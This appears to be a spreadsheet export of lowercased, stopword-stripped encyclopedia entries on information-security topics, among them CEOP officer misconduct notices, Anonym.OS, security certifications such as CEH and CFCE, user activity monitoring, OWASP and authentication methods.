misconduct notices served four police officers held management roles ceop. actions part independent police complaints commission (ipcc) investigation 16-month delay passing information 2,345 british child abuse suspects received 2012 toronto police service. spokesman ipcc said: "two officers retired since incident, officer remains national crime agency (nca) officer secondment lincolnshire police since returned there. four notices failing adequately progress manage referral toronto police project spade. investigation remains ongoing." information received canada included details doctor myles bradbury, subsequently imprisoned years sexual assaults child patients addenbrooke's hospital cambridge, martin goldberg, deputy head thorpe hall school southend, found dead interviewed police images children undressing changing rooms found possession. also internet watch foundation operation references external links official website</t>
  </si>
  <si>
    <t>Anonym.OS</t>
  </si>
  <si>
    <t>anonym.os live operating system based openbsd strong encryption anonymization tools. goal project provide secure, anonymous browsing access everyday users. operating system openbsd 3.8, although many packages added facilitate goal. used fluxbox window manager. project discontinued release beta (2006). distributed designed, created distributed kaos.theory/security.research. legacy although specific project longer updated, successors incognito (discontinued 2008) freesbie. also comparison operating systems security-focused operating system references external links anonym.os's sourceforge website anonym.os distrowatch</t>
  </si>
  <si>
    <t>Chinese National Vulnerability Database</t>
  </si>
  <si>
    <t>chinese national vulnerability database (cnnvd) people's republic china's national vulnerability database. operated https://www.cnvd.org.cn/ operated china information technology evaluation center maintained chinese ministry state security (mss). september 2020, database 117,454 vulnerabilities cataloged first entry dated january 2010. organisation organisation operated china technology evaluation center (cnitsec), office based mss, making organisation closely linked chinese intelligence apparatus. agency criticized trojan horse manipulated chinese intelligence order take advantage vulnerabilities reported order wage cyberwarfare foreign targets. according boston based cybersecurity firm recorded future, evaluates submitted vulnerabilities releasing order determine used purposes cyber-espionage; according researchers demonstrated extensive backdating vulnerabilities. china information technology evaluation center (cnitsec) according official website, cnnvd operated china information technology evaluation center cnitsec short whose purpose "analysis information communication security vulnerabilities information technology products systems; security risk assessment information networks important information systems party government organs; safety testing evaluation information technology products, systems engineering construction; competency assessments qualification reviews information security services professionals; theoretical research, technology research development development standards" references</t>
  </si>
  <si>
    <t>Chinese dark web</t>
  </si>
  <si>
    <t>Childnet</t>
  </si>
  <si>
    <t>childnet international registered charity aims make internet safe place children young people. activities educational resources childnet produce educational resources children, parents teachers range topics, including cyberbullying, sexting, copyright grooming. these available free online order online shop. childnet number websites provide advice information: childnet, kidsmart, safer internet centre. education sessions childnet’s education team internet safety sessions pupils, parents carers, staff members. they worked schools, local authorities, foster parent groups local police forces. policy work childnet involved policy work internationally, facilitate involvement young people policy process. will gardner, childnet, sits executive board council child internet safety. november 2011, childnet facilitated involvement young people executive board meeting council child internet safety.childnet part facebook’s safety advisory board, composed five leading internet safety organisations. facebook consults organisations issues related online safety.childnet launched youth project 2009 respond constructive criticisms made internet governance forum limited involvement young people igf. since then, childnet facilitated involvement young people annual conference, 2012, delivered first ever youth-chaired workshop igf. safer internet centre safer internet centre coordinated partnership three leading organisations; childnet international, internet watch foundation, south west grid learning. co-funded european commission three main functions: awareness centre, helpline hotline. safer internet safer internet celebrated worldwide raise awareness online safety. many people take safety internet granted reason important educate people possible data breaches. childnet, part safer internet centre, coordinate safer internet safer internet 2015 organizations taking part help promote safe, responsible positive digital technology children young people. safer internet centre launched study friendship digital launched #up2us film, made young people inspire others something kind online. references external links www.childnet.com</t>
  </si>
  <si>
    <t>Certified Ethical Hacker</t>
  </si>
  <si>
    <t>certified ethical hacker (ceh) qualification obtained demonstrating knowledge assessing security computer systems looking weaknesses vulnerabilities target systems, using knowledge tools malicious hacker, lawful legitimate manner assess security posture target system. this knowledge assessed answering multiple choice questions regarding various ethical hacking techniques tools. code exam 312-50. this certification made baseline progression (practical), launched march 2018, test penetration testing skills environment candidate must demonstrate ability apply techniques penetration testing tools compromise various simulated systems within virtual environment. ethical hackers employed organizations penetrate networks computer systems purpose finding fixing security vulnerabilities. ec-council offers another certification, known certified network defense architect (cnda). this certification designed united states government agencies available members selected agencies including private government contractors, primarily compliance directive 8570.01-m. also ansi accredited recognized gchq certified training (gct). examination certification achieved taking examination either attended training accredited training center (atc), completed ec-council’s learning portal, iclass. candidate opts self-study, application must filled proof submitted years relevant information security work experience. those without required years information security related work experience request consideration educational background. current version v11, released september 2020. exam, uses ec-council exam code (312-50) earlier versions, multiple-choice questions 4-hour time limit.the ec-council various atcs administer examination. members holding ceh/cnda designation well ec-council certifications) must seek re-certification program every three years, minimum credits. critical components focuses latest malware attacks, latest hacking tools, emerging attack vectors cyberspace. includes hacking challenges every module built 100% compliance nice framework ensure systematic role mapping. references further reading walker, matt; certified ethical hacker all-in-one exam guide, mcgraw-hill companies, 2011. isbn 978-0-07-177229-7 oriyano, sean-philip; ceh: certified ethical hacker version study guide, sybex publishing, 2014. isbn 978-1-118-64767-7 gregg, michael; certified ethical hacker exam prep, publishing, 2006. isbn 978-0-7897-3531-7 defino, steven; greenblatt, larry; official certified ethical hacker review guide: version (ec-council certified ethical hacker (ceh)), delmar cengage learning, march 2012. isbn 978-1-1332-8291-4 specialist; v10: ec-council certified ethical hacker complete training guide practice labs: exam: 312-50, 2018, isbn 978-1983005473 messier; certified ethical hacker study guide, sybex publishing, 2019. isbn 978-1119533191</t>
  </si>
  <si>
    <t>User activity monitoring</t>
  </si>
  <si>
    <t>field information security, user activity monitoring (uam) monitoring recording user actions. captures user actions, including applications, windows opened, system commands executed, checkboxes clicked, text entered/edited, urls visited nearly every on-screen event protect data ensuring employees contractors staying within assigned tasks, posing risk organization. user activity monitoring software deliver video-like playback user activity process videos user activity logs keep step-by-step records user actions searched analyzed investigate out-of-scope activities. issues need rose increase security incidents directly indirectly involve user credentials, exposing company information sensitive files. 2014, data breaches united states, resulting million exposed customer employee records. with breaches resulting weak exploited user credentials, become significant component infrastructure. main populations users aims mitigate risks are: contractors contractors used organizations complete information technology operational tasks. remote vendors access company data risks. even malicious intent, external user like contractor major security liability. users regular business users admitted access data necessary. generalized accounts give regular business users access classified company data. this makes insider threats reality business uses generalized accounts. users administrator accounts heavily monitored high-profile nature access. however, current tools generate “log fatigue” admin accounts. fatigue overwhelming sensation trying handle vast amount logs account result many user actions. harmful user actions easily overlooked thousands user actions compiled every day. overall risk according verizon data breach incident report, “the first step protecting data knowing access it.” today's environment, “there lack oversight control among employees access confidential, sensitive information.” this apparent many factors resulted major number security issues companies. components most companies usually separate necessary aspects three major components. visual forensics visual forensics involves creating visual summary potentially hazardous user activity. each user action logged, recorded. once user session completed, created written record visual record, whether screen-captures video exactly user done. this written record differs siem logging tool, captures data user-level system level –providing plain english logs rather syslogs (originally created debugging purposes). these textual logs paired corresponding screen-captures video summaries. using corresponding logs images, visual forensics component allows organizations search exact user actions case security incident. case security threat, i.e. data breach, visual forensics used show exactly user did, everything leading incident. visual forensics also used provide evidence enforcement investigate intrusion. user activity alerting user activity alerting serves purpose notifying whoever operates solution mishap misstep concerning company information. real-time alerting enables console administrator notified moment error intrusion occurs. alerts aggregated user provide user risk profile threat ranking. alerting customizable based combinations users, actions, time, location, access method. alerts triggered simply opening application, entering certain keyword address. alerts also customized based user actions within application, deleting creating user executing specific commands. user behavior analytics user behavior analytics additional layer protection help security professionals keep weakest link chain. monitoring user behavior, help dedicated software analyzes exactly user session, security professionals attach risk factor specific users and/or groups, immediately alerted flag warning high-risk user something interpreted high-risk action exporting confidential customer information, performing large database queries scope role, accessing resources accessing forth. features capturing activity collects user data recording activity every user applications, pages internal systems databases. spans access levels access strategies (rdp, ssh, telnet, ica, direct console login, etc.). some solutions pair citrix vmware environments. user activity logs solutions transcribe documented activities user activity logs. logs match video-playbacks concurrent actions. some examples items logged names applications run, titles pages opened, urls, text (typed, edited, copied/pasted), commands, scripts. video-like playback uses screen-recording technology captures individual user actions. each video-like playback saved accompanied user activity log. playbacks differ traditional video playback screen scraping, compiling sequential screen shots video-like replay. user activity logs combined video-like playback provides searchable summary user actions. this enables companies read, also view exactly particular user company systems. privacy some companies employees raised issue user privacy aspect uam. they believe employees resist idea actions monitored, even done security purposes. reality, strategies address concerns. while possible monitor every single user action, purpose systems snoop employee browsing history. solutions policy-based activity recording, enables console administrator program exactly monitored. audit compliance many regulations require certain level others require logs activity audit purposes. meets variety regulatory compliance requirements (hipaa, 27001, sox, etc....). typically implemented purpose audits compliance, serve companies make audits easier efficient. audit information request information user activity uam. unlike normal siem tools, help speed audit process building controls necessary navigate increasingly complex regulatory environment. ability replay user actions provides support determining impact regulated information security incident response. appliance software deployment models. appliance-based monitoring approaches dedicated hardware conduct monitoring looking network traffic. software-based monitoring approaches software agents installed nodes accessed users. more commonly, software requires installation agent systems (servers, desktops, servers, terminal servers) across users want monitor. these agents capture user activity reports information back central console storage analysis. these solutions quickly deployed phased manner targeting high-risk users systems sensitive information first, allowing organization running quickly expand user populations business requires. references</t>
  </si>
  <si>
    <t>4C Entity</t>
  </si>
  <si>
    <t>entity digital rights management (drm) consortium formed ibm, intel, panasonic toshiba established licensed interoperable cryptographic protection mechanisms removable media technologies. entity founded 1999 warner music approached companies develop stronger technologies then-novel dvd-audio format intel’s technology hacked.the group developed currently lease content protection recordable media (cprm) content protection prerecorded media (cppm) schemes, media block technology cryptomeria cipher along audio watermarks. entity also written content protection system architecture (cpsa), describes content protection solutions work together role current technology. cppm cprm implemented cards, dvd-audio, flash media, digital media formats. like many technologies, entity products criticized, associated press writing cprm “spark[ed] privacy concerns.” references external links entity</t>
  </si>
  <si>
    <t>Certified Forensic Computer Examiner</t>
  </si>
  <si>
    <t>certified forensic computer examiner (cfce) credential first certification demonstrating competency computer forensics relation windows based computers. cfce training certification conducted international association computer investigative specialists (iacis), non-profit, all-volunteer organization digital forensic professionals. history iacis formed commenced training 1990. predecessor cfce processing certificate (dpc). cfce introduced 1998 training expanded include examination windows-based computers. course materials also covers operating system associated file systems, however, certificate states proficiency windows. eligibility order undertake cfce certification process, candidate member iacis. iacis membership normally included enter cfce training certification process. there levels membership organization, regular associate. eligible regular membership, applicants must current full-time former full-time enforcement government employee, current full-time contractor government agency. regular members access training, certification, active listserv forensic research. associate membership available current aspiring members computer/digital forensics community able pass background check. associate members access benefits regular members exception regular members vote hold organizational offices. proof status verified upon application membership. https://www.iacis.com/membership/membership-overview/ certification process certification process taken internally externally conducted phases: peer review certification. internal certification candidate attends 2-week training course given iacis. courses conducted annually. us-based course conducted first half calendar year whilst european-based course conducted second half year. upon successful completion course, member assigned (volunteer) coach. coach guides student peer review phase, often suggesting reading materials experiments student, intended assist student fully understanding issues student difficulty. upon successful completion peer review phase candidate eligible enter certification phase consists practical exam based hard drive examination final exam. external certification candidate attend training, however, equivalent hours training comparable iacis training. recertification order certification remain current, member must undertake proficiency test 3-year period certification well complete hours continuing training computer forensics related field. additionally, member must conduct minimum average forensic examination year, minimum examinations 3-year period. member must also dues ($75 year) remain member good standing iacis. recognition cfce widely recognized non-tool certifications computer forensics current former enforcement personnel. some organizations computer forensics laboratory miami-dade police require members complete maintain certification. references external links official website cfce cfce</t>
  </si>
  <si>
    <t>Certified Network Defense Architect</t>
  </si>
  <si>
    <t>Certified Internet Web Professional</t>
  </si>
  <si>
    <t>certified internet professional (ciw) education program created community designers developers late 1990s. company currently owns ciw, certification partners, offers books, on-line learning high-stakes exams. third-party companies also sell preparation material.the program claims certifications created objectives suggested experts participate advisory council. these objectives said outline specific skills, accompanying training profiles proprietary free open source software. owners state education provide "vendor neutral," specific vendor profiled. idea instead teaching specific applications, program teaches important skills. however, ciw's relevance come question circles. because created "dot com" period, certifications like fallen criticism created simply cash certification. nevertheless, seems survived bust various critiques become world's largest education certification program. over 145,000 certifications issued since 1997. this number represents roughly 120,000 individuals worldwide.universities, community colleges secondary schools north america emea, japan china currently ciw. example, university west scotland uses needs base programs specific competencies outcomes. several certification paths, popular master designer, largely updated often. this credential given anyone passes following three separate exams: foundations (which makes individual "ciw associate") site designer e-commerce designer associate design specialist master designer certification retired june 2011. certifications previously awarded program remain valid. credentials issued.several tests, including "web design specialist" "site development associate", listed comptia mobile roadmap. community site community created stated mission instructors share ideas teach design development. community site accessible [1]. sources description technology institute: http://www.webtechnology.institute/moodle27/ review university west scotland (formerly university paisley): http://ciw.uws.ac.uk/ adoption scottish qualifications authority (sqa): japan page: https://web.archive.org/web/20181122142811/http://www.ciw-japan.com/ china partnership shandong government: http://www.chinatechnews.com/2005/06/19/2610-ciw-china-e-commerce-certifications-to-be-endorsed-by-shandong-government references</t>
  </si>
  <si>
    <t>Certified Information Security Manager</t>
  </si>
  <si>
    <t>Certified Information Systems Auditor</t>
  </si>
  <si>
    <t>Certified Information Technology Professional</t>
  </si>
  <si>
    <t>certified information technology professional (citp) professional certification professionals field information technology. citp credential recognizes technical expertise across wide range business-technology practice areas. credential given cpas only, different organisations offer professionals varied qualifications. these professionals expected able assess risk, uncover fraud perform audits within business. most firms offer certifications require unrevoked valid licence. qualifications citp firms, citp offered completed formal exam, includes five citp body knowledge areas: risk assessment fraud considerations internal controls information technology general controls evaluate, test report information management business intelligencethese main topic areas larger field information behind them; applying qualification need comprehensive understanding disciplines. addition, certain certifications advanced degrees also apply. awarded citp credential, must qualify total points application. citp credential application asked sign declaration intent comply requirements citp recertification. percentage citp applications randomly selected review year, selected, applicant agrees provide detailed documentation (including specifics business experience lifelong learning) support assertions application. citp body knowledge those applying citp require breadth knowledge fields listed above. each main topic number specific outcomes, similar found educational syllabus. following data comes american institute cpas, issuer citp certification. five fields listed split seven, simplify understandability information. technology strategic planning technology strategic planning looks understanding enterprise business strategy vision begin with. this focuses business focus position business industry. technology strategic planning also explores current environment business processes, well assessing risk business envisioning future environments well assessing strategic plans business also factor important body knowledge. architecture architecture looks business' infrastructure, software, people procedures well data flow. this also looks system reliability management, understanding protocols, standards enabling technologies required well. application development environments core topic, looking database design, data definition, models dataflow. business process enablement business process enablement looks business styled requirements, stakeholder identification requirements core topic. business functionality models paired risk business strategy complexity topic. impact models business something looked well, however, identify effects traditional business process. system development, acquisition, implementation, project management system development leads identification technology enablement business processes. acquisition systems commercial usage well understanding software's system development life cycle looks requirements, risks models again. system implementation identifies effects software implemented, project management assesses plans controls program implemented. information systems management information system management looks assessing organisation, policies procedures, also operations, effectiveness efficiencies business industry. this also assesses asset management, change control problem management. financial control resources looks performance metrics costs. systems security, reliability, audit control systems security looks reliability, controls evaluation particular system business. while focusing cyber security software play business, professionals also need understand privacy issues customers business. system audit control looks understanding system controls, testing controls, assessing effectiveness controls. governance regulation governance establishes risk thresholds critical information assets well establishing broad program principles. also protects stakeholder interests dependent this topic also pushes professional find broad understanding federal laws, rules standards present business' operation space. citp multiple entry point system (mep) awarded citp credential, must accumulate total points. total points earned based business experience, lifelong learning, and, required, results examination. business experience requirement awarded citp credential, candidate must earn minimum points business experience within five-year period preceding date application. maximum number business experience points earned preceding five-year period hours it-related business experience equals approximately point.the final number points earned category vary depending hours experience scope experience. eligible business experience must address seven practice areas currently comprise citp body knowledge. academics count time lecturing teaching towards business experience requirement. life long learning (lll) awarded citp credential, must also earn minimum points lifelong learning within five-year period preceding date application. maximum number lifelong learning points allowed five-year period objectives lifelong learning requirement twofold, maintain competency requiring timely updates existing technology knowledge skills provide mechanism monitoring maintenance competencythe following types lifelong learning activities eligible points: continuing professional education approved courses accredited university college other continuing education courses trade association conferences non-traditional learning methods self-directed reading presenting authoring other credentials designations certifications, advanced degrees, committee service oversight credential administered aicpa national accreditation commission volunteer committee dedicated aicpa staff. committee formed 2003 initially chaired, 2005, michael dickson, cpa.citp. succeeded current chair, gregory lafollette, cpa, citp. committee consists members serving staggered three-year terms. references</t>
  </si>
  <si>
    <t>Old Red Cracker</t>
  </si>
  <si>
    <t>cracker (abbreviated +orc) anonymous reverser. pioneers publishing cracking lessons internet. while identity unknown, reverse engineer fravia email correspondence spread tutorials.old cracker founded so-called "high cracking university" (+hcu), conduct research reverse code engineering (rce). addition sign front nickname reverser signified membership +hcu. +hcu published reverse engineering problem annually. also security hacker software cracking notes references external links http://www.woodmann.com/crackz/orc.htm search enigma hunt cracker</t>
  </si>
  <si>
    <t>OWASP</t>
  </si>
  <si>
    <t>open application security project (owasp) online community produces freely-available articles, methodologies, documentation, tools, technologies field application security. open application security project (owasp) provides free open resources. non-profit called owasp foundation. owasp 2021 published result recent research based comprehensive data compiled partner organizations. history mark curphey started owasp-open application security project september 2001. jeff williams served volunteer chair owasp late 2003 september 2011. 2015, matt konda chaired board.the owasp foundation, 501(c)(3) non-profit organization established 2004, supports owasp infrastructure projects. since 2011, owasp also registered non-profit organization belgium name owasp europe vzw. publications resources owasp ten: "top ten", first published 2003, regularly updated. aims raise awareness application security identifying critical risks facing organizations. many standards, books, tools, many organizations reference project, including mitre, dss, defense information systems agency (disa-stig), united states federal trade commission (ftc), owasp software assurance maturity model: software assurance maturity model (samm) project committed building usable framework help organizations formulate implement strategy application security tailored specific business risks facing organization. owasp development guide: development guide provides practical guidance includes j2ee, asp.net, code samples. development guide covers extensive array application-level security issues, injection modern concerns phishing, credit card handling, session fixation, cross-site request forgeries, compliance, privacy issues. owasp testing guide: owasp testing guide includes "best practice" penetration testing framework users implement organizations "low level" penetration testing guide describes techniques testing common application service security issues. version published september 2014, input individuals. owasp code review guide: code review guide currently release version 2.0, released july 2017. owasp application security verification standard (asvs): standard performing application-level security verifications. owasp security gateway (xsg) evaluation criteria project. owasp incident response guidance. this project provides proactive approach incident response planning. intended audience document includes business owners security engineers, developers, audit, program managers, enforcement legal council. owasp project: attack proxy (zap) easy integrated penetration testing tool finding vulnerabilities applications. designed used people wide range security experience including developers functional testers penetration testing. webgoat: deliberately insecure application created owasp guide secure programming practices. once downloaded, application comes tutorial different lessons instruct students exploit vulnerabilities intention teaching write code securely. owasp appsec pipeline: application security (appsec) rugged devops pipeline project place find information needed increase speed automation application security program. appsec pipelines take principles devops lean applies application security program. owasp automated threats applications: published july 2015 owasp automated threats applications project aims provide definitive information resources architects, developers, testers others help defend automated threats credential stuffing. project outlines automated threats defined owasp. owasp security project: focuses strategies solutions understand mitigate unique vulnerabilities security risks application programming interfaces (apis). includes recent list security 2019. awards owasp organization received 2014 haymarket media group magazine editor's choice award. also open source security foundation references external links official website</t>
  </si>
  <si>
    <t>Certified Computer Examiner</t>
  </si>
  <si>
    <t>certified computer examiner (cce) credential demonstrates competency computer forensics. offered international society computer examiners (isfce), organization hopes create maintain high standards computer examiners worldwide. qualifications candidates must criminal record adhere isfce code ethics. they least months professional experience documented training, pass online examination. well online examination, candidates must perform forensic examination least three "test media". once candidates successfully completed requirements isfce, considered certified computer examiners members isfce. maintain credential certified computer examiner, fifty hours education training must completed every years. addition, candidates must work least three media period. online examination also required every years recertification. external links official website</t>
  </si>
  <si>
    <t>Certified Information Systems Security Professional</t>
  </si>
  <si>
    <t>Certification</t>
  </si>
  <si>
    <t>certification provision independent body written assurance certificate) product, service system question meets specific requirements. formal attestation confirmation certain characteristics object, person, organization. this confirmation often, always, provided form external review, education, assessment, audit. accreditation specific organization's process certification. according u.s. national council measurement education, certification test credentialing test used determine whether individuals knowledgeable enough given occupational area labeled "competent practice" area. types common types certification modern society professional certification, person certified able competently complete task, usually passing examination and/or completion program study. some professional certifications also require obtain work experience related field certification awarded. some professional certifications valid lifetime upon completing certification requirements. others expire certain period time maintained education and/or testing. certifications differ within profession level specific area expertise refer. example, industry different certifications available software tester, project manager, developer. also, joint commission allied health personnel ophthalmology offers three certifications profession, increasing complexity. certification designate person sufficient knowledge subject area, passed test. this course apples exam-based certifications. education-based certifications, require person completes course study satisfies certain body knowledge claims demonstrate person sufficient knowledge subject area.certification refer state legally able practice work profession. that licensure. usually, licensure administered governmental entity public protection purposes professional association administers certification. licensure certification similar require demonstration certain level knowledge ability. another common type certification modern society product certification. this refers processes intended determine product meets minimum standards, similar quality assurance. different certification systems exist country. example, russia gost rostest. other types include: type certificate issued signify airworthiness aircraft manufacturing design academic degrees cyber security certification digital signatures public-key cryptography digital certification diving certification environmental certification film certification, also known motion picture rating system food safety certification music recording sales certification, "gold" "platinum" nursing credentials certifications professional certification (computer technology) sustainability certification standards certification certification dependent meeting specific requirements defined technical standard. this either international standard private standard. iseal alliance global food safety initiative examples private organizations represent private sector. promoting certification supply chains private corporations recognizing scheme owners adopt private standards. comparison, public sector intergovernmental organizations (igos) recommend international standards. scheme owners using private standards require scheme fees, typically annual payment issuing certificate. whereas international standards allow scheme ownership require fees issue certificate. further differences international standards private standards explained paper iso. attestations conformity attestations conformity made: first-party attestations conformity, individual organization providing good service offers assurance meets certain claims. second-party attestations conformity, association individual organization belongs provides assurance. third-party attestations conformity, also referred third party certification, involves independent impartial assessment performed certification body, also referred conformity assessment body, declaring specified requirements pertaining product, person, process, management system met.in respect third-party, notified body accredited body entitled accreditation body. upon definition standards regulations, accreditation body allow notified body provide third-party certification testing services. ensures assesses compliance previously-defined codes also provide official certification mark declaration conformity. software testing certifications software testing, certifications grouped exam-based education-based. exam-based certifications candidate must pass exam, also learned self-study. example, international software testing qualifications board certified tester international software testing qualifications board certified software tester certified software quality engineer american society quality. education-based certifications instructor-led sessions, course passed. certified software test professional (cstp), certified agile software test professional (castp), certified test manager (ctm) certifications institute software testing examples. common people require certifications undergo paid structured learning help achieve goals. references</t>
  </si>
  <si>
    <t>Authentication</t>
  </si>
  <si>
    <t>authentication (from greek: αὐθεντικός authentikos, "real, genuine", αὐθέντης authentes, "author") proving assertion, identity computer system user. contrast identification, indicating person thing's identity, authentication process verifying identity. might involve validating personal identity documents, verifying authenticity website digital certificate, determining artifact carbon dating, ensuring product document counterfeit. methods authentication relevant multiple fields. art, antiques anthropology, common problem verifying given artifact produced certain person certain place period history. computer science, verifying user's identity often required allow access confidential data systems.authentication considered three types: first type authentication accepting proof identity given credible person first-hand evidence identity genuine. when authentication required physical objects, proof could friend, family member colleague attesting item's provenance, perhaps witnessed item creator's possession. with autographed sports memorabilia, could involve someone attesting witnessed object signed. vendor selling branded items implies authenticity, evidence every step supply chain authenticated. centralized authority-based trust relationships back secure internet communication known public certificate authorities; decentralized peer-based trust, also known trust, used personal services email files (pretty good privacy, privacy guard) trust established known individuals signing other's cryptographic signing parties, instance. second type authentication comparing attributes object known objects origin. example, expert might look similarities style painting, check location form signature, compare object photograph. archaeologist, hand, might carbon dating verify artifact, chemical spectroscopic analysis materials used, compare style construction decoration artifacts similar origin. physics sound light, comparison known physical environment, used examine authenticity audio recordings, photographs, videos. documents verified created paper readily available time item's implied creation. attribute comparison vulnerable forgery. general, relies facts creating forgery indistinguishable genuine artifact requires expert knowledge, mistakes easily made, amount effort required considerably greater amount profit gained forgery. antiques, certificates great importance authenticating object interest value. certificates can, however, also forged, authentication poses problem. instance, meegeren, well-known art-forger, forged work father provided certificate provenance well; article jacques meegeren. criminal civil penalties fraud, forgery, counterfeiting reduce incentive falsification, depending risk getting caught. currency financial instruments commonly second type authentication method. bills, coins, cheques incorporate hard-to-duplicate physical features, fine printing engraving, distinctive feel, watermarks, holographic imagery, easy trained receivers verify. third type authentication relies documentation external affirmations. criminal courts, rules evidence often require establishing chain custody evidence presented. this accomplished written evidence log, testimony police detectives forensics staff handled some antiques accompanied certificates attesting authenticity. signed sports memorabilia usually accompanied certificate authenticity. these external records problems forgery perjury also vulnerable separated artifact lost. computer science, user given access secure systems based user credentials imply authenticity. network administrator give user password, provide user card access devices allow system access. case, authenticity implied guaranteed. consumer goods pharmaceuticals, perfume, fashion clothing three forms authentication prevent counterfeit goods taking advantage popular brand's reputation (damaging brand owner's sales reputation). mentioned above, item sale reputable store implicitly attests genuine, first type authentication. second type authentication might involve comparing quality craftsmanship item, expensive handbag, genuine articles. third type authentication could presence trademark item, legally protected marking, identifying feature aids consumers identification genuine brand-name goods. with software, companies taken great steps protect counterfeiters, including adding holograms, security rings, security threads color shifting ink. authentication factors ways someone authenticated fall three categories, based known factors authentication: something user knows, something user has, something user each authentication factor covers range elements used authenticate verify person's identity granted access, approving transaction request, signing document work product, granting authority others, establishing chain authority. security research determined positive authentication, elements least two, preferably three, factors verified. three factors (classes) elements factor are: knowledge factors: something user knows (e.g., password, partial password, passphrase, personal identification number (pin), challenge–response (the user must answer question pattern), security question). ownership factors: something user (e.g., wrist band, card, security token, implanted device, cell phone built-in hardware token, software token, cell phone holding software token). inherence factors: something user (e.g., fingerprint, retinal pattern, sequence (there assorted definitions sufficient), signature, face, voice, unique bio-electric signals, biometric identifiers). single-factor authentication weakest level authentication, single component three categories factors used authenticate individual's identity. factor offer much protection misuse malicious intrusion. this type authentication recommended financial personally relevant transactions warrant higher level security. multi-factor authentication multi-factor authentication involves authentication factors (something know, something have, something are). two-factor authentication special case multi-factor authentication involving exactly factors.for example, using bank card (something user has) along (something user knows) provides two-factor authentication. business networks require users provide password (knowledge factor) pseudorandom number security token (ownership factor). access very-high-security system might require mantrap screening height, weight, facial, fingerprint checks (several inherence factor elements) plus code (knowledge factor elements), still two-factor authentication. authentication types frequent types authentication available authenticating online users differ level security provided combining factors three categories factors authentication: strong authentication u.s. government's national information assurance glossary defines strong authentication layered authentication approach relying authenticators establish identity originator receiver information. european central bank (ecb) defined strong authentication procedure based three authentication factors". factors used must mutually independent least factor must "non-reusable non-replicable", except case inherence factor must also incapable stolen internet. european, well us-american understanding, strong authentication similar multi-factor authentication 2fa, exceeding rigorous requirements. fast identity online (fido) alliance striving establish technical specifications strong authentication. continuous authentication conventional computer systems authenticate users initial log-in session, cause critical security flaw. resolve problem, systems need continuous user authentication methods continuously monitor authenticate users based biometric trait(s). study used behavioural biometrics based writing styles continuous authentication method.recent research shown possibility using smartphones sensors accessories extract behavioral attributes touch dynamics, keystroke dynamics gait recognition. these attributes known behavioral biometrics could used verify identify users implicitly continuously smartphones. authentication systems built based behavioral biometric traits known active continuous authentication systems. digital authentication term digital authentication, also known electronic authentication e-authentication, refers group processes confidence user identities established presented electronic methods information system. digital authentication process creates technical challenges need authenticate individuals entities remotely network. american national institute standards technology (nist) created generic model digital authentication describes processes used accomplish secure authentication: enrollment individual applies credential service provider (csp) initiate enrollment process. after successfully proving applicant's identity, allows applicant become subscriber. authentication after becoming subscriber, user receives authenticator e.g., token credentials, user name. permitted perform online transactions within authenticated session relying party, must provide proof possesses authenticators. life-cycle maintenance charged task maintaining user's credential course lifetime, subscriber responsible maintaining authenticator(s).the authentication information pose special problems electronic communication, vulnerability man-in-the-middle attacks, whereby third party taps communication stream, poses communicating parties, order intercept information each. extra identity factors required authenticate party's identity. product authentication counterfeit products often offered consumers authentic. counterfeit consumer goods, electronics, music, apparel, counterfeit medications, sold legitimate. efforts control supply chain educate consumers help ensure authentic products sold used. even security printing packages, labels, nameplates, however, subject counterfeiting.in anti-counterfeiting technology guide, euipo observatory infringements intellectual property rights categorizes main anti-counterfeiting technologies market currently five main categories: electronic, marking, chemical physical, mechanical, technologies digital media.products packaging include variable code. code alone easy verify offers weak level authentication offers protection counterfeits unless scan data analyzed system level detect anomalies. increase security level, code combined digital watermark copy detection pattern robust copy attempts authenticated smartphone. secure storage device used authentication consumer electronics, network authentication, license management, supply chain management, etc. generally, device authenticated needs sort wireless wired digital connection either host system network. nonetheless, component authenticated need electronic nature authentication chip mechanically attached read connector host e.g. authenticated tank printer. products services secure coprocessors applied offer solution much difficult counterfeit options time easily verified. packaging packaging labeling engineered help reduce risks counterfeit consumer goods theft resale products. some package constructions difficult copy pilfer indicating seals. counterfeit goods, unauthorized sales (diversion), material substitution tampering reduced anti-counterfeiting technologies. packages include authentication seals security printing help indicate package contents counterfeit; subject counterfeiting. packages also include anti-theft devices, dye-packs, rfid tags, electronic article surveillance tags activated detected devices exit points require specialized tools deactivate. anti-counterfeiting technologies used packaging include: taggant fingerprinting uniquely coded microscopic materials verified database encrypted micro-particles unpredictably placed markings (numbers, layers colors) visible human holograms graphics printed seals, patches, foils labels used point sale visual verification micro-printing second-line authentication often used currencies serialized barcodes printing marks visible light track trace systems codes link products database tracking system water indicators become visible contacted water tracking genes embedded onto labels traced color-shifting film visible marks switch colors texture tilted tamper evident seals tapes destructible graphically verifiable point sale barcodes data codes tracked rfid chips chips information content literary forgery involve imitating style famous author. original manuscript, typewritten text, recording available, medium packaging anything e-mail headers) help prove disprove authenticity document. however, text, audio, video copied media, possibly leaving informational content authentication. various systems invented allow authors provide means readers reliably authenticate given message originated relayed them. these involve authentication factors like: difficult-to-reproduce physical artifact, seal, signature, watermark, special stationery, fingerprint. shared secret, passphrase, content message. electronic signature; public-key infrastructure often used cryptographically guarantee message signed holder particular private key.the opposite problem detection plagiarism, information different author passed person's work. common technique proving plagiarism discovery another copy similar text, different attribution. cases, excessively high quality style mismatch raise suspicion plagiarism. literacy literature authentication literacy, authentication readers’ process questioning veracity aspect literature verifying questions research. fundamental question authentication literature does believe related that, authentication project therefore reading writing activity students document relevant research process builds students' critical literacy. documentation materials literature beyond narrative texts likely include informational texts, primary sources, multimedia. process typically involves internet hands-on library research. when authenticating historical fiction particular, readers consider extent major historical events, well culture portrayed (e.g., language, clothing, food, gender roles), believable period. history state-of-the-art historically, fingerprints used authoritative method authentication, court cases elsewhere raised fundamental doubts fingerprint reliability. outside legal system well, fingerprints easily spoofable, british telecom's computer security official noting "few" fingerprint readers already tricked spoof another. hybrid two-tiered authentication methods offer compelling solution, private keys encrypted fingerprint inside device. computer data context, cryptographic methods developed (see digital signature challenge–response authentication) currently spoofable originator's compromised. that originator anyone attacker) knows know) compromise irrelevant. known whether cryptographically based authentication methods provably secure, since unanticipated mathematical developments make vulnerable attack future. occur, call question much authentication past. particular, digitally signed contract questioned attack cryptography underlying signature discovered. authorization process authorization distinct authentication. whereas authentication process verifying "you are", authorization process verifying "you permitted trying do". while authorization often happens immediately authentication (e.g., logging computer system), mean authorization presupposes authentication: anonymous agent could authorized limited action set. access control familiar authentication authorization access control. computer system supposed used authorized must attempt detect exclude unauthorized. access therefore usually controlled insisting authentication procedure establish degree confidence identity user, granting privileges established identity. also references external links national institute standards technology, u.s. department commerce (august 2013). "electronic 